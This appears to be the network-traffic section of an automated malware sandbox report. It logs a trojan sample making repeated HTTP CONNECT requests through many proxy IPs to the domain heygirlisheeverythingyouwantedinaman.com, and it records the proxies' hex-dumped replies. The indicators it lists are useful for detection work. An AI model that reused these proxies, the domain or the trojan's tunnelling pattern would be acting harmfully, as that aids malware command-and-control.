                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                778192.168.2.85116179.137.204.161328625828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.481544971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                779192.168.2.852407110.12.211.140805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.481563091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.760899067 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                780192.168.2.85252551.75.126.150646155828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.497899055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                781192.168.2.852518198.12.253.1498785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.540947914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991770029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.491883039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                782192.168.2.852481162.253.68.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.540965080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                783192.168.2.852484170.106.193.128300015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.543277979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                784192.168.2.8524118.213.129.2080815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.551840067 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:29.864326000 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                785192.168.2.851985102.130.125.86805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.551840067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.649209023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.785756111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.858782053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.650062084 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                Feb 23, 2024 14:28:40.650070906 CET294INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyou


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                786192.168.2.852587104.16.105.106805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.552617073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.641247988 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                787192.168.2.852406103.216.49.23380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.552618027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.901204109 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                788192.168.2.85240281.70.253.15280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.559123993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                789192.168.2.852409103.23.100.141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.559439898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                790192.168.2.851914113.11.183.14241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.559719086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                791192.168.2.852442211.222.252.18781975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.559720039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                792192.168.2.85253188.79.243.10331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.570590019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.747486115 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/3.5.28
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 1002
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Content-Language: en
                                                                                X-Cache: MISS from ah_test
                                                                                Via: 1.1 ah_test (squid/3.5.28)
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 31 33 3a 32 38 3a 32 37 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64
                                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Fri, 23 Feb 2024 13:28:27 GMT</p></d


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                793192.168.2.852511146.59.2.185805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.570590019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                794192.168.2.85243658.234.116.19781975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.570669889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                795192.168.2.852536193.242.210.140805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.577109098 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:27.811099052 CET1286INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Server: Apache
                                                                                X-Powered-By: PHP/5.3.3-7+squeeze17
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Last-Modified: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Expires: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                X-Content-Security-Policy: allow 'self'; frame-ancestors 'none'
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 3042
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 44 65 66 61 75 6c 74 2d 53 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 68 74 6d 6c 35 73 68 69 76 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 0a 09 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 63 73 73 2f 6d 61 69 6e 5f 69 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 6a 71 75 65 72 79 2e 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 3c 74 69 74 6c
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="Default-Style" content="text/css" /><script type="text/javascript" src="js/jquery.min.js"></script><script type="text/javascript" src="js/jquery-ui.min.js"></script>...[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]--><link href="templates/Froxlor/assets/css/main.css" rel="stylesheet" type="text/css" />...[if IE]><link rel="stylesheet" href="templates/Froxlor/css/main_ie.css" type="text/css" /><![endif]--><link href="css/jquery.jquery-ui.css" rel="stylesheet" type="text/css"/><script type="text/javascript" src="templates/Froxlor/assets/js/main.js"></script><link href="templates/Froxlor/assets/img/favicon.ico" rel="icon" type="image/x-icon" /><titl
                                                                                Feb 23, 2024 14:28:27.811155081 CET1286INData Raw: 65 3e 46 72 6f 78 6c 6f 72 20 53 65 72 76 65 72 20 4d 61 6e 61 67 65 6d 65 6e 74 20 50 61 6e 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20
                                                                                Data Ascii: e>Froxlor Server Management Panel</title><style type="text/css">body { font-family: Verdana, Geneva, sans-serif;}</style></head><body><div class="loginpage"><article class="login bradius"><header class="dark">
                                                                                Feb 23, 2024 14:28:27.811173916 CET941INData Raw: 69 6f 6e 20 76 61 6c 75 65 3d 22 50 6f 72 74 75 67 75 26 61 6d 70 3b 65 63 69 72 63 3b 73 22 20 20 3e 50 6f 72 74 75 67 75 26 65 63 69 72 63 3b 73 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 52 75 73 73 69 61 6e 22 20
                                                                                Data Ascii: ion value="Portugu&amp;ecirc;s" >Portugu&ecirc;s</option><option value="Russian" >Russian</option><option value="Danish" >Danish</option><option value="Italian" >Italian</option><option value="Bulgarian" >Bulgarian</option><option value="
                                                                                Feb 23, 2024 14:28:27.811788082 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 7b 5c 60 0a 91 7e e1 b3 4e b3 39 60 c0 44 10 d6 bf 0e 0b 3c fa dd 8f a9 f7 cd d6 ef cf 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: e{\`~N9`D<*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#zExsEjEwvnkZwR:Q+cs
